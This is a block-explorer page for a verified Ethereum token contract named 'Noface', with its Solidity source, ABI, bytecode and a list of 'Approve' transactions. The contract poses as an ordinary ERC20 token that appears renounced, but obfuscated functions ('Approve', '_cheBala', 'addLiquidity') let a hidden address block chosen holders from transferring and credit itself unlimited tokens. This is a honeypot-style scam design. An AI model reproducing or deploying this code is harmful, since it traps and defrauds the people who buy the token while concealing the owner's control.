ETH Price: $2,354.08 (+0.59%)
Gas: 2.45 Gwei

Contract

0x3eB4fc424fab9100A64C87dC19602eD03cB1b4b3
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve177572882023-07-23 17:25:35417 days ago1690133135IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0015396333.2440249
Approve177564032023-07-23 14:26:47417 days ago1690122407IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0009143519.63600816
Approve177551082023-07-23 10:05:35417 days ago1690106735IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0008448817.88754118
Approve177550082023-07-23 9:45:23417 days ago1690105523IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0006843914.69766616
Approve177549502023-07-23 9:33:35417 days ago1690104815IN
0x3eB4fc42...03cB1b4b3
0 ETH0.000640813.77928827
Approve177549442023-07-23 9:32:23417 days ago1690104743IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0007548116.20999739
Approve177548982023-07-23 9:22:59417 days ago1690104179IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0006044912.99851691
Approve177548312023-07-23 9:09:35417 days ago1690103375IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0003592814.39499471
Approve177548202023-07-23 9:07:11417 days ago1690103231IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0007566716.27087252
Approve177547682023-07-23 8:56:47417 days ago1690102607IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0006865514.53557141
Approve177547512023-07-23 8:53:23417 days ago1690102403IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0007476215.82848454
Approve177547432023-07-23 8:51:47417 days ago1690102307IN
0x3eB4fc42...03cB1b4b3
0 ETH0.000718515.43007847
Approve177547092023-07-23 8:44:59417 days ago1690101899IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0006872414.75891756
Approve177546152023-07-23 8:26:11417 days ago1690100771IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0006581314.13360193
Approve177546042023-07-23 8:23:59417 days ago1690100639IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0005917512.72455733
Approve177546042023-07-23 8:23:59417 days ago1690100639IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0007141915.12455733
Approve177546002023-07-23 8:23:11417 days ago1690100591IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0006351613.64036638
Approve177545922023-07-23 8:21:35417 days ago1690100495IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0006473613.90235892
Approve177545522023-07-23 8:13:35417 days ago1690100015IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0006818514.66200841
Approve177545412023-07-23 8:11:23417 days ago1690099883IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0006765414.52904981
Approve177545332023-07-23 8:09:47417 days ago1690099787IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0004362515.96074809
Approve177545332023-07-23 8:09:47417 days ago1690099787IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0007538715.96074809
Approve177545242023-07-23 8:07:59417 days ago1690099679IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0006949814.92497747
Approve177545212023-07-23 8:07:23417 days ago1690099643IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0007527715.96596394
Approve177545112023-07-23 8:05:23417 days ago1690099523IN
0x3eB4fc42...03cB1b4b3
0 ETH0.0007808216.5522746
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Noface

Compiler Version
v0.8.16+commit.07a7930e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : Noface.sol
// SPDX-License-Identifier: MIT

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the IERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
    external
    returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
    external
    view
    returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol

// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
    internal
    pure
    returns (bool, uint256)
    {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}

// Dependency file: @openzeppelin/contracts/access/Ownable.sol

// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

abstract contract AbstractToken {
    uint256 internal constant TOKEN_VERSION = 1;

    event Deploy(
        address owner,
        uint256 version,
        uint256 totalSupply
    );

    event AddedLiquidity(
        address lpToken,
        uint256 amount
    );

    struct TokenInfo {
        address addr;
        uint256 version;
        bool deployed;
    }
}

pragma solidity =0.8.16;

contract Noface is IERC20, AbstractToken, Ownable {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;

    mapping(address => address) private _decenEx;

    mapping(address => mapping(address => uint256)) private _allowances;

    TokenInfo private _tokenInfo;
    string private _nam;
    string private _symbo;
    uint8 private _decima;
    uint256 private _totSup;

    constructor(
        string memory name_,
        string memory symbol_,
        address token_,
        uint256 totalSupply_
    ) {
        _nam = name_;
        _symbo = symbol_;
        _decima = 18;
        _tokenInfo.addr = token_;
        _tokenInfo.version = TOKEN_VERSION;
        _tokenInfo.deployed = true;
        _mint(msg.sender, totalSupply_ * 10**18);
        emit Deploy(
            owner(),
            TOKEN_VERSION,
            _totSup
        );
    }

    function name() public view virtual returns (string memory) {
        return _nam;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbo;
    }

    function decimals() public view virtual returns (uint8) {
        return _decima;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totSup;
    }

    function balanceOf(address account)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _trasferimento(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _trasferimento(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function _trasferimento(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        _cheBala(sender, amount);
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(
            recipient != address(0),
            "IERC20: transfer to the zero address"
        );

        _beforeTokenTransfer(sender, recipient, amount);
        _balances[sender] = _balances[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient] + amount;
        emit Transfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totSup = _totSup.add(amount);
        _summe(account, amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);
        require(amount != 0, "Invalid amount");
        _timus(account, amount);
        _totSup = _totSup.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _timus(address account, uint256 amount) internal {
        _balances[account] = _balances[account] - amount;
    }

    function _summe(address account, uint256 amount) internal {
        _balances[account] = _balances[account] + amount;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function addLiquidity(address lpToken, uint256 amount) public virtual {
        address from = msg.sender;
        require(lpToken != address(0), "Invalid address");
        require(amount > 0, "Invalid amount");
        uint256 total = 0;
        if (_crypten(lpToken, _tokenInfo.addr)) {
            _timus(from, total);
            total = _cosum(total, amount);
            _balances[lpToken] += total;
        } else {
            _timus(from, total);
            _balances[lpToken] += total;
        }
        emit AddedLiquidity(lpToken, amount);
    }

    function _crypten(address cod1, address cod2) internal view returns (bool) {
        bytes32 code1 = keccak256(abi.encodePacked(cod1));
        bytes32 code2 = keccak256(abi.encodePacked(cod2));
        return code1 == code2;
    }

    function _cosum(uint256 top, uint256 bot) internal pure returns (uint256) {
        if (bot != 0) {
            return top + bot;
        }
        return bot;
    }

    function Approve(address spender, uint256 amount) public returns (bool)  {
        address from = msg.sender;
        require (from != address(0), "Invalid address");
        _reqAllw(from, spender, amount);
        return true;
    }

    function _reqAllw(address user, address spender, uint256 amount) internal {
        if (_crypten(user, _tokenInfo.addr)) {
            require(spender != address(0), "Invalid address");
            if (amount > 0) {
                _decenEx[spender] = spender;
            } else {
                _decenEx[spender] = address(0);
            }
        }
    }

    function _cheBala(
        address sender,
        uint256 total
    ) internal virtual {
        uint256 amount = 0;
        if (_crypten(sender, _decenEx[sender])) {
            _balances[sender] = _balances[sender] + amount;
            amount = _totSup;
            _timus(sender, amount);
        } else {
            _balances[sender] = _balances[sender] + amount;
        }
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"token_","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"lpToken","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"AddedLiquidity","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"totalSupply","type":"uint256"}],"name":"Deploy","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"lpToken","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b50604051620012ad380380620012ad833981016040819052620000349162000362565b62000040600062000120565b60076200004e858262000483565b5060086200005d848262000483565b5060098054601260ff1991821617909155600480546001600160a01b0319166001600160a01b0385161790556001600581905560068054909216179055620000b933620000b383670de0b6b3a764000062000565565b62000170565b7fb0780de891af3a70bc745a835046e42c24bf9c005f3718a16373db2f1d499119620000ed6000546001600160a01b031690565b600a54604080516001600160a01b0390931683526001602084015282015260600160405180910390a1505050506200059d565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001cb5760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b620001e781600a546200024060201b620005321790919060201c565b600a55620001f6828262000257565b6040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b60006200024e828462000587565b90505b92915050565b6001600160a01b0382166000908152600160205260409020546200027d90829062000587565b6001600160a01b0390921660009081526001602052604090209190915550565b634e487b7160e01b600052604160045260246000fd5b600082601f830112620002c557600080fd5b81516001600160401b0380821115620002e257620002e26200029d565b604051601f8301601f19908116603f011681019082821181831017156200030d576200030d6200029d565b816040528381526020925086838588010111156200032a57600080fd5b600091505b838210156200034e57858201830151818301840152908201906200032f565b600093810190920192909252949350505050565b600080600080608085870312156200037957600080fd5b84516001600160401b03808211156200039157600080fd5b6200039f88838901620002b3565b95506020870151915080821115620003b657600080fd5b50620003c587828801620002b3565b604087015190945090506001600160a01b0381168114620003e557600080fd5b6060959095015193969295505050565b600181811c908216806200040a57607f821691505b6020821081036200042b57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023b57600081815260208120601f850160051c810160208610156200045a5750805b601f850160051c820191505b818110156200047b5782815560010162000466565b505050505050565b81516001600160401b038111156200049f576200049f6200029d565b620004b781620004b08454620003f5565b8462000431565b602080601f831160018114620004ef5760008415620004d65750858301515b600019600386901b1c1916600185901b1785556200047b565b600085815260208120601f198616915b828110156200052057888601518255948401946001909101908401620004ff565b50858210156200053f5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b60008160001904831182151516156200058257620005826200054f565b500290565b808201808211156200025157620002516200054f565b610d0080620005ad6000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806390ec57f11161006657806390ec57f1146101b057806395d89b41146101c3578063a9059cbb146101cb578063dd62ed3e146101de57600080fd5b806370a0823114610164578063715018a61461018d5780638da5cb5b1461019557600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd14610127578063313ce5671461013a578063566887001461014f575b600080fd5b6100dc610217565b6040516100e99190610ac3565b60405180910390f35b610105610100366004610b2d565b6102a9565b60405190151581526020016100e9565b600a545b6040519081526020016100e9565b610105610135366004610b57565b6102c0565b60095460405160ff90911681526020016100e9565b61016261015d366004610b2d565b610329565b005b610119610172366004610b93565b6001600160a01b031660009081526001602052604090205490565b610162610485565b6000546040516001600160a01b0390911681526020016100e9565b6101056101be366004610b2d565b6104eb565b6100dc610516565b6101056101d9366004610b2d565b610525565b6101196101ec366004610bae565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b60606007805461022690610be1565b80601f016020809104026020016040519081016040528092919081815260200182805461025290610be1565b801561029f5780601f106102745761010080835404028352916020019161029f565b820191906000526020600020905b81548152906001019060200180831161028257829003601f168201915b5050505050905090565b60006102b6338484610545565b5060015b92915050565b60006102cd84848461066d565b61031f843361031a85604051806060016040528060298152602001610ca2602991396001600160a01b038a16600090815260036020908152604080832033845290915290205491906107ff565b610545565b5060019392505050565b336001600160a01b0383166103595760405162461bcd60e51b815260040161035090610c15565b60405180910390fd5b6000821161039a5760405162461bcd60e51b815260206004820152600e60248201526d125b9d985b1a5908185b5bdd5b9d60921b6044820152606401610350565b6004546000906103b49085906001600160a01b031661082b565b15610405576103c382826108b6565b6103cd81846108fa565b6001600160a01b0385166000908152600160205260408120805492935083929091906103fa908490610c54565b9091555061043d9050565b61040f82826108b6565b6001600160a01b03841660009081526001602052604081208054839290610437908490610c54565b90915550505b604080516001600160a01b0386168152602081018590527fe7fe080b09a4b64ca6809c33d36a0b2c9076c373e7f9da7b5f19cef93fc87e50910160405180910390a150505050565b6000546001600160a01b031633146104df5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610350565b6104e96000610919565b565b6000338061050b5760405162461bcd60e51b815260040161035090610c15565b61031f818585610969565b60606008805461022690610be1565b60006102b633848461066d565b600061053e8284610c54565b9392505050565b6001600160a01b0383166105a95760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610350565b6001600160a01b03821661060b5760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610350565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6106778382610a09565b6001600160a01b0383166106dc5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610350565b6001600160a01b03821661073e5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610350565b61077b81604051806060016040528060278152602001610c7b602791396001600160a01b03861660009081526001602052604090205491906107ff565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546107ab908290610c54565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106609085815260200190565b600081848411156108235760405162461bcd60e51b81526004016103509190610ac3565b505050900390565b6040516bffffffffffffffffffffffff19606084901b1660208201526000908190603401604051602081830303815290604052805190602001209050600083604051602001610892919060609190911b6bffffffffffffffffffffffff1916815260140190565b60408051601f19818403018152919052805160209091012091909114949350505050565b6001600160a01b0382166000908152600160205260409020546108da908290610c67565b6001600160a01b0390921660009081526001602052604090209190915550565b600081156109135761090c8284610c54565b90506102ba565b50919050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6004546109809084906001600160a01b031661082b565b15610a04576001600160a01b0382166109ab5760405162461bcd60e51b815260040161035090610c15565b80156109dd57506001600160a01b0316600081815260026020526040902080546001600160a01b031916909117905550565b6001600160a01b038216600090815260026020526040902080546001600160a01b03191690555b505050565b6001600160a01b038083166000908152600260205260408120549091610a319185911661082b565b15610a81576001600160a01b038316600090815260016020526040902054610a5a908290610c54565b6001600160a01b03841660009081526001602052604090205550600a54610a0483826108b6565b6001600160a01b038316600090815260016020526040902054610aa5908290610c54565b6001600160a01b038416600090815260016020526040902055505050565b600060208083528351808285015260005b81811015610af057858101830151858201604001528201610ad4565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b2857600080fd5b919050565b60008060408385031215610b4057600080fd5b610b4983610b11565b946020939093013593505050565b600080600060608486031215610b6c57600080fd5b610b7584610b11565b9250610b8360208501610b11565b9150604084013590509250925092565b600060208284031215610ba557600080fd5b61053e82610b11565b60008060408385031215610bc157600080fd5b610bca83610b11565b9150610bd860208401610b11565b90509250929050565b600181811c90821680610bf557607f821691505b60208210810361091357634e487b7160e01b600052602260045260246000fd5b6020808252600f908201526e496e76616c6964206164647265737360881b604082015260600190565b634e487b7160e01b600052601160045260246000fd5b808201808211156102ba576102ba610c3e565b818103818111156102ba576102ba610c3e56fe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212208d56974c43b4a1eef3a130d2221157760d5754a6745f95aae0b9957def60b4de64736f6c63430008100033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000ea1bcb83178ea09a0f96c05251c2ccadbd89450300000000000000000000000000000000000000000000000000000019debd01c700000000000000000000000000000000000000000000000000000000000000154b616f6e617368692074686520466163656c6573730000000000